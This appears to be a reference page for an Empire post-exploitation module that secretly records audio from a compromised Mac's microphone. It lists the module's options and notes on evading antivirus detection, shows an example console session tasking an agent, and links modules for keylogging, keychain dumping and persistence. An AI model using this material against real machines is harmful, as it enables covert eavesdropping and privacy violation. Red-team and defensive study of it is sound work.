Osx_mic_record - Empire Module
This page contains detailed information about how to use the python/collection/osx/osx_mic_record Empire module. For list of all Empire modules, visit the Empire Module Library.
Module Overview
Name: osx_mic_record
Module: python/collection/osx/osx_mic_record
Source code:
empire/server/modules/python/collection/osx/osx_mic_record.yaml
MITRE ATT&CK:
T1512
Language: Python
Needs admin: No
OPSEC safe: No
Background: No
The osx_mic_record module records audio through the MacOS webcam mic by leveraging the Apple AVFoundation API.
This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.
Note that the osx_mic_record module does not need administrative privileges to work properly which means that a normal user can run this module.
Required Module Options
This is a list of options that are required by the osx_mic_record module:
Agent
Agent to record audio from.
Additional Module Options
This is a list of additional options that are supported by the osx_mic_record module:
OutputDir
Directory on remote machine in recorded audio should be saved. (Default: /tmp).
Default value: /tmp
.
RecordTime
The length of the audio recording in seconds. (Default: 5).
Osx_mic_record Example Usage
Here's an example of how to use the osx_mic_record module in the Empire client console:
[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/osx/ducky) > usemodule python/collection/osx/osx_mic_record
Author @s0lst1c3
Background False
Comments Executed within memory, although recorded audio will touch disk while
the script is running. This is unlikely to trip A/V, although a user
may notice the audio file if it stored in an obvious location.
Description Records audio through the MacOS webcam mic by leveraging the Apple
AVFoundation API.
Language python
Name python/collection/osx/osx_mic_record
NeedsAdmin False
OpsecSafe False
Techniques http://attack.mitre.org/techniques/T1512
,Record Options------,----------,-----------------------------------,
| Name | Value | Required | Description |
|------------|-------|----------|-----------------------------------|
| Agent | | True | Agent to record audio from. |
|------------|-------|----------|-----------------------------------|
| OutputDir | /tmp | False | Directory on remote machine in |
| | | | recorded audio should be saved. |
| | | | (Default: /tmp) |
|------------|-------|----------|-----------------------------------|
| RecordTime | 5 | False | The length of the audio recording |
| | | | in seconds. (Default: 5) |
'------------'-------'----------'-----------------------------------'
(Empire: usemodule/python/collection/osx/osx_mic_record) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/python/collection/osx/osx_mic_record) > execute
[*] Tasked Y4LHEV83 to run Task 1
...
Now wait for the results to come.
Author
References
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/python/collection/osx/osx_mic_record.yaml
- http://attack.mitre.org/techniques/T1512
See Also
Check also the following modules related to this module:
- python/collection/osx/sniffer
- python/collection/osx/imessage_dump
- python/collection/osx/kerberosdump
- python/collection/osx/keychaindump_chainbreaker
- python/collection/osx/prompt
- python/collection/osx/hashdump
- python/collection/osx/keychaindump_decrypt
- python/collection/osx/browser_dump
- python/collection/osx/pillage_user
- python/collection/osx/webcam
- python/collection/osx/screenshot
- python/collection/osx/keychaindump
- python/collection/osx/search_email
- python/collection/osx/screensaver_alleyoop
- python/collection/osx/native_screenshot_mss
- python/collection/osx/clipboard
- python/collection/osx/keylogger
- python/collection/osx/native_screenshot
- python/trollsploit/osx/change_background
- python/trollsploit/osx/say
- python/trollsploit/osx/thunderstruck
- python/trollsploit/osx/login_message
- python/management/osx/shellcodeinject64
- python/management/osx/screen_sharing
- python/situational_awareness/host/osx/situational_awareness
- python/situational_awareness/host/osx/HijackScanner
- python/privesc/osx/piggyback
- python/privesc/osx/dyld_print_to_file
- python/persistence/osx/mail
- python/persistence/osx/LaunchAgent
- python/persistence/osx/loginhook
- python/persistence/osx/CreateHijacker
- python/persistence/osx/LaunchAgentUserLandPersistence
- python/persistence/osx/RemoveLaunchAgent
Version
This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.